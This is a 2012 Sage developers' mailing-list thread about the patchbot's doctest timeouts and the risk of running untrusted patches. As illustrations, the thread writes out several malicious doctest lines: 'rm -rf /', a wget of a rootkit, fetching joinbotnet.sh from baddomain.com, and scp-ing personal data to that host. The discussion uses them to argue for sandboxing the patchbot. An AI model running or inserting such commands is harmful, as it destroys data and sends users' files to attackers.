On Wed, Feb 15, 2012 at 11:10 AM, Jason Grout <[email protected]> wrote: > On 2/15/12 12:59 PM, William Stein wrote: >> >> On Wed, Feb 15, 2012 at 10:31 AM, kcrisman<[email protected]> wrote: >>>>> >>>>> expected behavior. >>>> >>>> >>>> It does always timeout. The regular doctests take 1300 seconds for >>>> sandpile.py! I need to figure out what's going on there. >>>> >>>>> I think at this point manual intervention is required. Or was there >>>>> something else you were thinking it should do (because clearly you >>>>> were surprised, which isn't the intent). >>>> >>>> >>>> Well, I wasn't *too* surprised. I guess I was hoping for everything to >>>> work perfectly with no intervention. But it does seem to be working now, >>>> with a longer timeout. >>>> >>> >>> Some followup (#10702 notwithstanding): >>> >>> So I tried out the patchbot. Seemed to work reasonably well at >>> first. >>> >>> Then I came into my office this morning. Computer was humming at a >>> VERY decent clip; I could not get the screen to appear, Ctrl-C did >>> nothing, nothing nothing nothing, but clearly very busy (testing, >>> perhaps). I had to restart it manually. >> >> >> Yikes! >> >> I'm still worried -- what if some jerk posts a patch to trac that contains >> >> sage: os.system('rm -rf /') >> Got you! >> >> I think a patch like the above is a very real possibility. All that >> would have to happen would be for one of the 500 trac accounts (which >> sometimes have very dumb passwords) to be compromised, or for somebody >> to get a trac account, and boom -- some users running a patchbot loose >> everything. That's not a pretty thought. >> > > or > > sage: email('SPAM MESSAGE') > hahaha > > or > > sage: os.system('wget ...') # download rootkit > pwned! > > or > > sage: os.system("wget http://baddomain.com/joinbotnet.sh";) > sage: os.system("scp allyourpersonaldata.tar.gz baddomain.com") > sage: os.system("joinbotnet.sh") > > > I would definitely want this thing sandboxed as much as possible, preferably > running on a virtual machine that is completely firewalled off from the net, > except communication with the patch server.
A virtual machine would be really good because it will normalize *what* compute the tests are being run on. It's bad because of the same reason, I guess. But if the point of lots of people running patchbots is that we don't have enough compute power on sage.math to do it, then using a virtualmachine seems like by far the best option. If it is to test on a wide variety of OS/hardware combinations, then it is a bad option. -- William -- To post to this group, send an email to [email protected] To unsubscribe from this group, send an email to [email protected] For more options, visit this group at http://groups.google.com/group/sage-devel URL: http://www.sagemath.org
